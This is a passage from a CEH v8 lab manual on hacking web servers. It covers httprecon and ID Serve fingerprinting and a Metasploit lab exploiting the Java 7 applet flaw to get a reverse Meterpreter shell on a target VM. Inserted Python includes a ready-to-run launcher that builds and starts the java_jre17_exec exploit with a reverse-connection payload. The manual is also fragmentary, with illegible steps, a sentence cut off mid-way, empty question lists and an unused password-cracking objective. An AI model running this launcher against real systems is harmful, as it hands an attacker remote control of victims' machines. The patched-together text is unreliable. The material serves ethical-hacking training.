Lab Objectives
The objective of this lab is to help students learn to detect unpatched security flaws, verbose error messages, and much more. The objective of this lab is to:
C E H L ab M an u al Page 731
- Footprint web servers
- Crack remote passwords
Lab Environment
To carry out this, you need:
- Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers
Lab Duration
Time: 40 Minutes
Lab Tasks
Recommended labs to demonstrate web server hacking:
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.
Lab Scenario
Web applications are the most important way for an organization to publish information, interact with Internet users, and establish an e-commerce or e-government presence. However, if an organization is not rigorous in configuring and operating its public web site, it may be vulnerable to a variety of security threats. Although the threats in cyberspace remain largely the same as in the physical world (e.g., fraud, theft, vandalism, and terrorism), they can be far more dangerous online. Organizations can face monetary losses, damage to reputation, or legal action if an intruder successfully violates the confidentiality of their data. DoS attacks are easy for attackers to attempt because of the number of possible attack vectors, the variety of automated tools available, and the low skill level needed to use the tools. DoS attacks, as well as threats of initiating DoS attacks, are also increasingly being used to blackmail organizations. In order to be an expert ethical hacker and penetration tester, you must understand how to perform footprinting on web servers.
Lab Objectives
The objective of this lab is to help students learn to footprint web servers. It will teach you how to:
- Use the httprecon tool
- Get a web server footprint
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers
Lab Environment
To carry out the lab, you need:
- httprecon from the tools folder (if you decide to download the latest version, the screenshots shown in the lab might differ)
- A web browser with Internet access
Note: httprecon is an open-source application that can fingerprint the software behind a web server.
Lab Duration
Time: 10 Minutes
Overview of httprecon
httprecon is a tool for advanced web server fingerprinting, similar to httprint. The httprecon project does research in the field of web server fingerprinting, also known as HTTP fingerprinting. The goal is highly accurate identification of given httpd implementations.
TASK: Footprinting a Webserver
Lab Tasks
1.-3. (step text not legible on this page)
FIGURE: httprecon 7.3 main window: File, Configuration, Fingerprinting, Reporting and Help menus; a Target field (http:// host, port 80); result tabs GET existing, GET long request, GET non existing, GET wrong protocol, HEAD existing and OPTIONS common; a hit list with Hits and Match % columns.
Note: httprecon is distributed as a ZIP file containing the binary and fingerprint databases.
4.-6. (step text not legible on this page)
FIGURE: GET existing response for http://juggyboy.com:80/ and the resulting hit list. The Server banner claims Microsoft-IIS/6.0, yet Apache 1.3.37 also appears among the scored candidates (with hit counts and match percentages), which is exactly why httprecon scores many response attributes instead of trusting the banner.
HTTP/1.1 200 OK
Date: Thu, 18 Oct 2012 11:36:10 GMT
Content-Length: 8451
Content-Type: text/html
Content-Location: http://juggyboy.com/index.html
Last-Modified: Tue, 02 Oct 2012 11:32:12 GMT
Accept-Ranges: none
ETag: "a47ee9091a0cd1:7a49"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
7. Click the GET long request tab, which lists the response to the GET long request probe. Then click Fingerprint Details.
Note: httprecon does not rely on simple banner announcements by the analyzed software.
FIGURE 1.3: The fingerprint and GET long request result of the entered website (httprecon 7.3 - http://juggyboy.com:80/)
GET long request response:
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 18 Oct 2012 11:35:20 GMT
Connection: close
Content-Length: 34
Fingerprint Details for this probe:
Protocol Version: HTTP/1.1
Statuscode: 400
Statustext: Bad Request
Banner: (none)
X-Powered-By: (none)
Header Spaces: 1
Capital after Dash: 1
Header-Order Full: Content-Type,Date,Connection,Content-Length
Header-Order Limit: Content-Type,Date,Connection,Content-Length
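The attributes httprecon lists under Fingerprint Details can be computed directly from raw responses. The following Python is an added example, not code from the lab or from the httprecon project: it parses the two responses the screenshots show for juggyboy.com (embedded below as constructed byte strings), extracts protocol version, status code and text, banner, X-Powered-By, header spacing, capitalisation after dashes and header order for each probe, and scores them against a small constructed fingerprint database (two hand-written entries standing in for httprecon's real databases). The probe and attribute names follow the httprecon UI; the database values, the header-order limit of 4 and the percentage formula are assumptions of the example.

```python
"""Behavioural HTTP fingerprinting in the style of httprecon (added example)."""
import re
from typing import Dict, List, Tuple

# Constructed probe responses; they mirror the juggyboy.com replies shown in
# the lab screenshots (GET existing and GET long request).
SAMPLE_RESPONSES: Dict[str, bytes] = {
    "GET existing": (
        b"HTTP/1.1 200 OK\r\n"
        b"Date: Thu, 18 Oct 2012 11:36:10 GMT\r\n"
        b"Content-Length: 8451\r\n"
        b"Content-Type: text/html\r\n"
        b"Content-Location: http://juggyboy.com/index.html\r\n"
        b"Last-Modified: Tue, 02 Oct 2012 11:32:12 GMT\r\n"
        b"Accept-Ranges: none\r\n"
        b'ETag: "a47ee9091a0cd1:7a49"\r\n'
        b"Server: Microsoft-IIS/6.0\r\n"
        b"X-Powered-By: ASP.NET\r\n"
        b"\r\n<html>...</html>"
    ),
    "GET long request": (
        b"HTTP/1.1 400 Bad Request\r\n"
        b"Content-Type: text/html\r\n"
        b"Date: Thu, 18 Oct 2012 11:35:20 GMT\r\n"
        b"Connection: close\r\n"
        b"Content-Length: 34\r\n"
        b"\r\n<h1>Bad Request</h1>"
    ),
}

HEADER_ORDER_LIMIT = 4  # "Header-Order Limit" compares only the first few headers (assumed)


def parse_response(raw: bytes) -> Dict[str, object]:
    """Extract the Fingerprint Details attributes from one raw HTTP response."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    m = re.match(r"(HTTP/\d\.\d) (\d{3}) ?(.*)$", lines[0])
    if not m:
        raise ValueError("not an HTTP status line: %r" % lines[0])
    names: List[str] = []
    values: Dict[str, str] = {}
    space_after_colon = capital_after_dash = True
    for line in lines[1:]:
        name, _, value = line.partition(":")
        names.append(name)
        values[name.lower()] = value.strip()
        if value and not value.startswith(" "):
            space_after_colon = False  # e.g. "Server:nginx" with no space
        if any(p and not p[0].isupper() for p in name.split("-")[1:]):
            capital_after_dash = False  # e.g. "Content-type"
    return {
        "protocol_version": m.group(1),
        "status_code": int(m.group(2)),
        "status_text": m.group(3),
        "banner": values.get("server", ""),
        "x_powered_by": values.get("x-powered-by", ""),
        "header_spaces": int(space_after_colon),
        "capital_after_dash": int(capital_after_dash),
        "header_order_full": ",".join(names),
        "header_order_limit": ",".join(names[:HEADER_ORDER_LIMIT]),
    }


KEYS = ("protocol_version", "status_code", "status_text", "banner",
        "x_powered_by", "header_spaces", "capital_after_dash", "header_order_limit")


def expect(*vals: object) -> Dict[str, object]:
    """Build one database record (expected attribute values for a probe)."""
    return dict(zip(KEYS, vals))


# Constructed fingerprint database: implementation -> probe -> expected values.
FINGERPRINT_DB: Dict[str, Dict[str, Dict[str, object]]] = {
    "Microsoft IIS 6.0": {
        "GET existing": expect("HTTP/1.1", 200, "OK", "Microsoft-IIS/6.0", "ASP.NET", 1, 1,
                               "Date,Content-Length,Content-Type,Content-Location"),
        "GET long request": expect("HTTP/1.1", 400, "Bad Request", "", "", 1, 1,
                                   "Content-Type,Date,Connection,Content-Length"),
    },
    "Apache 1.3.37": {
        "GET existing": expect("HTTP/1.1", 200, "OK", "Apache/1.3.37", "", 1, 1,
                               "Date,Server,Last-Modified,ETag"),
        "GET long request": expect("HTTP/1.1", 414, "Request-URI Too Large", "Apache/1.3.37", "", 1, 1,
                                   "Date,Server,Connection,Content-Type"),
    },
}


def fingerprint(responses: Dict[str, bytes]) -> Dict[str, Dict[str, object]]:
    """Parse every probe reply into its attribute set (probe name -> attributes)."""
    return {probe: parse_response(raw) for probe, raw in responses.items()}


def score(observed: Dict[str, Dict[str, object]],
          db: Dict[str, Dict[str, Dict[str, object]]]) -> List[Tuple[str, int, float]]:
    """Rank database entries by hits (one hit per matching attribute per probe).
    The banner is a single attribute among many, so a forged Server header alone
    cannot carry an entry to the top: that is the point of behavioural fingerprinting."""
    ranking = []
    for impl, probes in db.items():
        hits = total = 0
        for probe, expected in probes.items():
            got = observed.get(probe, {})
            for attr, want in expected.items():
                total += 1
                hits += int(got.get(attr) == want)
        ranking.append((impl, hits, round(100.0 * hits / total, 2) if total else 0.0))
    ranking.sort(key=lambda r: (-r[1], r[0]))
    return ranking


if __name__ == "__main__":
    for impl, hits, pct in score(fingerprint(SAMPLE_RESPONSES), FINGERPRINT_DB):
        print("%-20s hits=%2d match=%6.2f%%" % (impl, hits, pct))
```

With the two sample responses the IIS 6.0 entry matches all 16 attributes while the Apache entry matches 9, even though both share the same protocol version, status text and header-formatting conventions; adding more probes (GET non existing, HEAD, OPTIONS) sharpens the separation further.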
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.
Tool/Utility: httprecon Tool
Information collected:
Content-Type: text/html
Content-Location: http://juggyboy.com/index.html
ETag: "a47ee9091a0cd1:7a49"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Questions
1.
2.
Internet Connection Required
[x] Yes
[ ] No
Platform Supported
[x] Classroom
[x] iLabs
Lab Scenario
In the previous lab you learned to use the httprecon tool. httprecon is a
Lab Objectives
This lab will show you how to footprint web servers and how to use ID Serve. It will teach you how to:
- Use the ID Serve tool
- Get a web server footprint
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers
Lab Environment
To carry out the lab, you need:
- ID Serve from the tools folder (if you decide to download the latest version, the screenshots shown in the lab might differ)
- A web browser with Internet access
Lab Duration
Time: 10 Minutes
Note: ID Serve is a simple, free, small (26 Kbytes), and fast general-purpose Internet server identification utility.
TASK: Footprinting a Webserver
Overview of ID Serve
ID Serve identifies an Internet server from the headers it returns and also attempts to determine the domain name associated with an IP. That second process is known as a reverse DNS lookup and is handy when checking firewall logs or receiving an IP address from someone. Not all IPs that have a forward direction lookup (Domain-to-IP) have a reverse (IP-to-Domain) lookup, but many do.
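What ID Serve's reverse lookup does can be reproduced, and made stricter, in a few lines. The following Python is an added example, not part of the lab or of ID Serve: given an IP it builds the in-addr.arpa name a resolver queries, fetches the PTR record, and then confirms that the returned name resolves forward to the same IP (forward-confirmed reverse DNS), which is the check you want before trusting a name taken from a firewall log. The resolver functions are parameters, so the example runs offline against the constructed records below; the socket-based defaults perform real lookups. The addresses and host names in the sample records are made up.

```python
"""Reverse DNS lookup with forward confirmation (added example)."""
import ipaddress
import socket
from typing import Callable, Dict, List, Optional

# Constructed DNS data for the offline run: PTR records and A records.
FAKE_PTR: Dict[str, str] = {
    "10.0.0.2": "realhome.lab.example",  # PTR and A agree
    "10.0.0.3": "stale.lab.example",     # PTR exists, but the A record points elsewhere
    # 10.0.0.4 has no PTR record at all
}
FAKE_A: Dict[str, List[str]] = {
    "realhome.lab.example": ["10.0.0.2"],
    "stale.lab.example": ["10.0.0.9"],
}


def fake_reverse(ip: str) -> Optional[str]:
    """Offline PTR lookup against the constructed records."""
    return FAKE_PTR.get(ip)


def fake_forward(name: str) -> List[str]:
    """Offline A lookup against the constructed records."""
    return FAKE_A.get(name, [])


def reverse_lookup(ip: str) -> Optional[str]:
    """PTR lookup via the system resolver; None when no PTR exists."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None


def forward_lookup(name: str) -> List[str]:
    """All addresses a name resolves to; empty when it does not resolve."""
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(name, None)})
    except socket.gaierror:
        return []


def ptr_name(ip: str) -> str:
    """The in-addr.arpa (or ip6.arpa) name the resolver queries for this IP."""
    return ipaddress.ip_address(ip).reverse_pointer


def classify(ip: str,
             reverse: Callable[[str], Optional[str]] = reverse_lookup,
             forward: Callable[[str], List[str]] = forward_lookup) -> Dict[str, object]:
    """Return the PTR name for ip and whether it is forward-confirmed.

    status is one of:
      "confirmed"    PTR exists and the name resolves back to ip
      "unconfirmed"  PTR exists but the name does not resolve to ip (do not trust it)
      "no-ptr"       the IP has no reverse mapping, as the overview says many do not
    """
    query = ptr_name(ip)
    name = reverse(ip)
    if name is None:
        return {"ip": ip, "query": query, "name": None, "status": "no-ptr"}
    status = "confirmed" if ip in forward(name) else "unconfirmed"
    return {"ip": ip, "query": query, "name": name, "status": status}


if __name__ == "__main__":
    for sample_ip in ("10.0.0.2", "10.0.0.3", "10.0.0.4"):
        print(classify(sample_ip, fake_reverse, fake_forward))
```

Call classify(ip) with no extra arguments to query the real resolver. Anyone who controls the reverse zone for an address can put any name in its PTR record, which is why an "unconfirmed" result should be reported as the bare IP rather than as the name it claims.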
Lab Tasks
1.-3. (step text not legible on this page)
FIGURE: ID Serve (Internet Server Identification Utility, v1.02, Personal Security Freeware by Steve Gibson, Copyright (c) 2003 Gibson Research Corp.) with its Background, Server Query and Q&A/Help tabs. The Server Query tab reads "Enter or copy / paste an Internet server URL or IP address here (example: www.microsoft.com)" and has a Copy button for the result.
4.-7. (step text not legible on this page)
FIGURE: Server Query result for http://10.0.0.2/realhome:
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 07 Aug 2012 06:05:46 GMT
Accept-Ranges: bytes
ETag: "c95dc4af6274cd1:0"
Lab Analysis
Document all the server information.
Tool/Utility: ID Serve
Information collected:
HTTP/1.1 200 OK
Content-Type: text/html
Questions
1. Analyze how ID Serve determines a site's web server.
2. What happens if we enter an IP address instead of a URL?
Internet Connection Required
[ ] Yes
[x] No
Platform Supported
[x] Classroom
[x] iLabs
Lab 3
Exploiting Java Vulnerability Using Metasploit Framework
Metasploit software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments.
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers
Lab Scenario
Penetration testing is a method of evaluating the security of a computer system or network by simulating an attack from malicious outsiders (who do not have an authorized means of accessing the organization's systems) and malicious insiders (who have some level of authorized access). The process involves an active analysis of the system for any potential vulnerabilities that could result from poor or improper system configuration, known or unknown hardware or software flaws, or operational weaknesses in process or technical countermeasures. This analysis is carried out from the position of a potential attacker and can involve active exploitation of security vulnerabilities. The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known subproject is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important subprojects include the Opcode Database, shellcode archive, and security research. Metasploit Framework is one of the main tools for every penetration test engagement. To be an expert ethical hacker and penetration tester, you must have a sound understanding of Metasploit Framework, its various modules, exploits, payloads, and commands in order to perform a pen test of a target.
Lab Objectives
The objective of this lab is to demonstrate exploitation of JDK vulnerabilities to take control of a target machine.
Lab Environment
In this lab, you need:
- A computer running Windows Server 2012 as host machine
- Windows 8 running on a virtual machine as target machine
- A web browser and Microsoft .NET Framework 2.0 or later on both the host and the target machine
- JRE 7u6 running on the target machine (remove any other version of JRE installed on the target machine). The JRE 7u6 setup file (jre-7u6-windows-i586.exe) is available at D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers\Webserver Attack Tools\Metasploit
- You can also download the JRE 7u6 setup file at http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1637588.html
- You can also download the latest version of Metasploit Framework from http://www.metasploit.com/download/ (if you decide to download the latest version, the screenshots shown in the lab might differ)
Lab Duration
Time: 20 Minutes
TASK: Installing Metasploit Framework
Double-click metasploit-latest-windows-installer.exe and follow the wizard-driven installation steps to install Metasploit Framework.
FIGURE: Firefox "This Connection is Untrusted" page shown when the Metasploit web interface at https://localhost is opened after installation. Firefox explains: "Normally, when you try to connect securely, sites will present trusted identification to prove that you are going to the right place. However, this site's identity can't be verified. If you usually connect to this site without problems, this error could mean that someone is trying to impersonate the site, and you shouldn't continue." Under Technical Details the Certificate Status reads: "This site attempts to identify itself with invalid information. Wrong Site: certificate belongs to a different site, which could indicate an identity theft. Unknown Identity: certificate is not trusted, because it hasn't been verified by a recognized authority using a secure signature." Firefox also warns that legitimate banks, stores, and other public sites will not ask you to do this. Click I Understand the Risks, then Add Exception. The exception is acceptable here only because the interface is the local Metasploit installation you just set up; the same warning on an Internet site should be treated as the possible impersonation the dialog describes.
5. In the Add Security Exception wizard, click Confirm Security Exception.
Note: With sun.awt.SunToolkit, we can actually invoke getField() by abusing findMethod() in Statement.invokeInternal() (but getField() must be public, and that's not always the case in JDK 6) in order to access Statement.acc's private field, modify AccessControlContext, and then disable Security Manager.
6. On the Metasploit Setup and Configuration Login screen, enter text in the Username, Password, and Password confirmation fields and click Create Account.
FIGURE: Metasploit account creation form (Username, Password, Password confirmation, Create Account button).
Enter your valid email address in the Metasploit Community option and click GO.
FIGURE: Product activation page comparing Metasploit Pro (smart exploitation, password auditing, web application scanning, social engineering, team collaboration, reporting, enterprise-level support) with the free Metasploit Community edition (network discovery, vulnerability scanner import, basic exploitation, module browser); the Community option has an "Enter email address" field and a Go button.
9. Now log in to your email account and copy the license key as shown in the following figure.
Note: To be successfully exploited, an unsuspecting user running an affected release in a browser will need to visit a malicious web page that leverages this vulnerability. Successful exploits can impact the availability, integrity, and confidentiality of the user's system.
FIGURE: Rapid7 license email: "Thank you for choosing Rapid7 Metasploit Community Edition. Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners such as Nexpose - for free. Your license is valid for one year and expires on 11/15/2013. When your license runs out, you can simply apply for a new license using the same registration mechanism."
FIGURE: Metasploit "4 More Steps To Get Started" page; step 1 reads "Copy the Product Key from the email we just sent you", and the key is pasted into the Product Key field on the following screen.
Note: The Metasploit Framework will always be free and open source. The Metasploit Project and Rapid7 are fully committed to supporting and growing the Metasploit Framework as well as providing advanced solutions for users who need an alternative to developing their own penetration testing tools. It's a promise.
FIGURE: Metasploit Community home page showing "Activation Successful", with the Projects list and the Product News pane.
TASK: Updating Metasploit
FIGURE: Administration menu of Metasploit Community with the Software Updates and Software License entries.
14. Click Check for Updates, and after checking the updates, click Install.
Note: By default, Metasploitable's network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network. (Note: A video tutorial on installing Metasploitable 2 is available at the link "Tutorial on installing Metasploitable 2.0 on a VirtualBox Host Only network".)
15. After completing the updates it will ask you to restart, so click Restart.
TASK: Creating a New Metasploit Project
17. After completion of the restart it will redirect to Metasploit - Home. Now click Create New Project from the Project drop-down list.
FIGURE: Metasploit Community Projects page: the Project drop-down offers New Project, Hide Network Ranges and Show All Projects; the project list has Active sessions, Tasks, Owner, Members, Updated and Description columns, with the default project owned by system.
18. In Project Settings, provide the Project Name and enter a Description, leave the Network Range set to its default, and click Create Project.
Note: The Metasploit Framework is a penetration testing system and development platform that you can use to create security tools and exploits. The Metasploit Framework is written in Ruby and includes components in C and assembler. The Metasploit Framework consists of tools, libraries, modules, and user interfaces. The basic function of the Metasploit Framework is a module launcher that allows the user to configure an exploit module and launch the exploit against a target system.
FIGURE: Project Settings form with the Project name, Description and Network range fields. In the screenshot the Description field holds the module's own description of the exploit: "The exploit takes advantage of two issues in JDK 7: The ClassFinder and MethodFinder.findMethod(). Both were newly introduced in JDK 7. ClassFinder is a replacement for classForName back in JDK 6. It allows untrusted code to obtain a reference and have access to a restricted package in JDK 7, which can be used to abuse sun.awt.SunToolkit (a restricted package). With sun.awt.SunToolkit we can actually invoke ..." (the text is cut off in the screenshot).
FIGURE: Overview page of the new "Java Exploit" project, with the Overview, Analysis, Sessions, Campaigns, Web Apps, Modules, Tags, Reports and Tasks tabs. The Penetration counters (hosts discovered, services detected, vulnerabilities identified), the Evidence Collection counters (passwords cracked, SMB hashes stolen, SSH keys stolen) and the Cleanup counter (closed sessions) are all zero, and Recent Events is empty.
TASK: Running the Exploit
FIGURE: Modules page with the Search Modules box set to 2012-4681; the Module Statistics and Search Keywords panes list the searchable fields (module type, OS, disclosure date, CVE, OSVDB, BID, EDB, module ranking).
FIGURE 3.19: Metasploit Java 7 Applet Remote Code Execution Exploit found
a. In Payload Options, set the Connection Type as Reverse and in Listener Host enter the IP address where Metasploit is running.
b. In Module Options, enter the SRV Host IP address where Metasploit is running.
c. Enter the URI Path (in this lab we are using greetings) and click Run Module.
FIGURE: Module page for the Java 7 Applet Remote Code Execution exploit. The author list is only partly legible (James Forshaw, jduck, juan vazquez). The module notes read: "The module is designed to run in the background, exploiting clients as they connect. In the case of browser exploits, please set the URIPATH option below if you want to control which URL is used to host the exploit. The SRVPORT option can be used to change the listening port. In the case of passive utility modules (auxiliary) the module output is available from the Task log after the module has been started." Target Settings is Generic (Java Payload) with a Meterpreter payload; the option list includes the listener port (1024-65535, the local port to listen on), Negotiate SSL for incoming connections, a path to a custom SSL certificate, the SSL version to use, and the URI path for this exploit.
Note: In Metasploit Pro, you can define IPv6 addresses for target hosts. For example, when you perform a discovery scan, scan a web application, execute a bruteforce attack, or run a module, you can define an IPv6 address for the target hosts. For modules, Metasploit Pro provides several payloads that provide IPv6 support for Windows x86, Linux x86, BSD x86, PHP, and cmd.
24. Now switch to the Windows 8 virtual machine, launch the Chrome browser, enter http://10.0.0.10:8080/greetings in the address bar and press Enter.
25. Click Run this time on the "Java(TM) was blocked because it is out of date" prompt in the Chrome browser. This prompt is Chrome's out-of-date plug-in block (the bar also offers Update plug-in...); the exploit only runs because the user overrides it, which is the user interaction the note above describes.
FIGURE: Chrome on the target at 10.0.0.10:8080/greetings/ with the out-of-date Java plug-in bar.
26. Now switch to your Windows Server 2012 host machine and check the Metasploit task pane. Metasploit will start capturing the reverse connection from the target machine.
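The web UI choices in steps a to c and the victim-side URL of step 24 map onto a handful of msfconsole settings. The following Python is an added example, not part of the lab or of Metasploit: it writes the equivalent resource script for exploit/multi/browser/java_jre17_exec (reverse Java Meterpreter, SRV host and listener host 10.0.0.10, SRV port 8080, URI path greetings, as used in the lab) after validating the addresses and ports, returns the URL the target must open, and can hand the script to msfconsole -r. The module path, payload name and option names are Metasploit's own; the listener port 4444, the loopback check and the same-socket check are assumptions of the example, and msfconsole is only invoked if you call launch().

```python
"""Resource script for the lab's Java 7 applet exploit (added example)."""
import ipaddress
import shutil
import subprocess
from pathlib import Path
from typing import Dict

MODULE = "exploit/multi/browser/java_jre17_exec"
PAYLOAD = "java/meterpreter/reverse_tcp"

LAB_OPTIONS: Dict[str, object] = {
    "SRVHOST": "10.0.0.10",   # where the malicious page is served (step b)
    "SRVPORT": 8080,          # port the target browses to (step 24)
    "URIPATH": "greetings",   # URI path chosen in step c
    "LHOST": "10.0.0.10",     # listener host for the reverse connection (step a)
    "LPORT": 4444,            # listener port (assumed; the UI accepts 1024-65535)
}


def validate(opts: Dict[str, object]) -> Dict[str, object]:
    """Reject mistakes that otherwise surface only as a callback that never arrives."""
    out = dict(opts)
    for key in ("SRVHOST", "LHOST"):
        addr = ipaddress.ip_address(str(out[key]))  # ValueError on junk
        if addr.is_loopback:
            raise ValueError("%s must not be loopback: the target cannot reach it" % key)
    for key in ("SRVPORT", "LPORT"):
        port = int(out[key])
        if not 1 <= port <= 65535:
            raise ValueError("%s out of range: %d" % (key, port))
        out[key] = port
    if out["SRVPORT"] == out["LPORT"] and out["SRVHOST"] == out["LHOST"]:
        raise ValueError("SRVPORT and LPORT would bind the same socket")
    uri = str(out["URIPATH"]).strip("/")
    if not uri:
        raise ValueError("URIPATH must not be empty")
    out["URIPATH"] = uri
    return out


def is_valid(opts: Dict[str, object]) -> bool:
    """True when validate() accepts the options."""
    try:
        validate(opts)
        return True
    except ValueError:
        return False


def build_rc(opts: Dict[str, object] = LAB_OPTIONS) -> str:
    """Return the resource-script text equivalent to the web UI steps."""
    o = validate(opts)
    lines = [
        "use %s" % MODULE,
        "set PAYLOAD %s" % PAYLOAD,
        "set SRVHOST %s" % o["SRVHOST"],
        "set SRVPORT %d" % o["SRVPORT"],
        "set URIPATH %s" % o["URIPATH"],
        "set LHOST %s" % o["LHOST"],
        "set LPORT %d" % o["LPORT"],
        "exploit -j",  # background job, like Run Module in the UI
    ]
    return "\n".join(lines) + "\n"


def victim_url(opts: Dict[str, object] = LAB_OPTIONS) -> str:
    """The URL the target browser must open (step 24)."""
    o = validate(opts)
    return "http://%s:%d/%s" % (o["SRVHOST"], o["SRVPORT"], o["URIPATH"])


def launch(rc_path: Path, opts: Dict[str, object] = LAB_OPTIONS) -> int:
    """Write the script and start msfconsole on it; returns msfconsole's exit status."""
    rc_path.write_text(build_rc(opts))
    if shutil.which("msfconsole") is None:
        raise FileNotFoundError("msfconsole not on PATH")
    return subprocess.call(["msfconsole", "-q", "-r", str(rc_path)])


if __name__ == "__main__":
    print(build_rc(), end="")
    print("target must browse to", victim_url())
```

Running the file prints the script and the victim URL; launch(Path("java_jre17.rc")) starts the server and the listener as a background job, after which the session appears under sessions -l in msfconsole just as it appears under the Sessions tab in step 27.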
FIGURE 3.23: Metasploit capturing the reverse connection of the targeted machine (Tasks pane of the Java Exploit project)
Note: Project Management: A Metasploit Pro project contains the penetration test that you want to run. A project defines the target systems, network boundaries, modules, and web campaigns that you want to include in the penetration test. Additionally, within a project, you can use discovery scan to identify target systems and bruteforce to gain access to systems.
27. Click the Sessions tab to view the captured connection of the target machine.
Note: User Management: Administrators can assign user roles to manage the level of access that the user has to projects and administrative tasks. You can manage user accounts from the Administration menu.
28. Click the captured session to view the information of the target machine as shown in the following screenshot.
FIGURE: Sessions page of the Java Exploit project. Active Sessions lists Session 1 on 10.0.0.12 (OS: Windows, Type: Meterpreter, Attack Module: JAVA_JRE17_EXEC); Closed Sessions is empty.
Note: Global Settings: Global settings define settings that all projects use. You can access global settings from the Administration menu. From the global settings, you can set the payload type for the modules and enable access to the diagnostic console through a web browser. Additionally, from global settings, you can create API keys, post-exploitation macros, persistent listeners, and Nexpose Consoles.
Note: System Management: As an administrator, you can update the license key and perform software updates. You can access the system management tools from the Administration menu.
FIGURE: Detail page for Session 1 on 10.0.0.12, with the session information (type, attack module, host) and the Available Actions list (Collect System Data, followed by the file browser and Command Shell actions used in the next steps).
31. You can view and modify the files from the target machine.
Note: If a bruteforce is successful, Metasploit Pro opens a session on the target system. You can take control of the session through a command shell or Meterpreter session. If there is an open session, you can collect system data, access the remote file system, pivot attacks and traffic, and run post-exploitation modules.
FIGURE: File browser for Session 1 showing a Windows system directory listing on the target (System32, SysWOW64, Temp and other folders) with file names, sizes and modification timestamps from May to November 2012.
32. You can also launch a command shell of the target machine by clicking Command Shell from the sessions captured.
33. To view the system IP address and other information through the command shell in Metasploit, type ipconfig /all and press Enter.
Note: Manual exploitation provides granular control over the exploits that you run against the target systems. You run one exploit at a time, and you can choose the modules and evasion options that you want to use.
34. The following screenshot shows the IP address and other details of your target machine.
FIGURE: Command shell output for Session 1 at a "meterpreter >" prompt: the interfaces are listed in Meterpreter's own format (Interface 13, Name, Hardware MAC 00:00:00:00:00:00, MTU, addresses). That format, and the all-zero hardware address, show that this is the Java Meterpreter running inside the exploited JVM rather than a native Windows cmd.exe shell, so what you see is what the JVM reports about the interfaces, not the output of Windows ipconfig /all.
35. Click the Go back one page button in the Metasploit browser to exit the command shell.
Note: A report provides comprehensive results from a penetration test. Metasploit Pro provides several types of standard reports that range from high level, general overviews to detailed report findings. You can generate a report in PDF, Word, XML, and HTML.
37. It will display Session Killed. Now from the Account drop-down list, select Logout.
FIGURE 3.34: Metasploit Session Killed and Logging out: the Account drop-down shows User Settings and Logout, Active Sessions is empty, and Closed Sessions lists the Windows Meterpreter session opened by the JAVA_JRE17_EXEC attack module.
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Tool/Utility: Metasploit Framework
Questions
1. How would you create an initial user account from a remote system?
2. Describe one or more vulnerabilities that Metasploit can exploit.
Internet Connection Required
[ ] Yes
[x] No
Platform Supported
[x] Classroom
[x] iLabs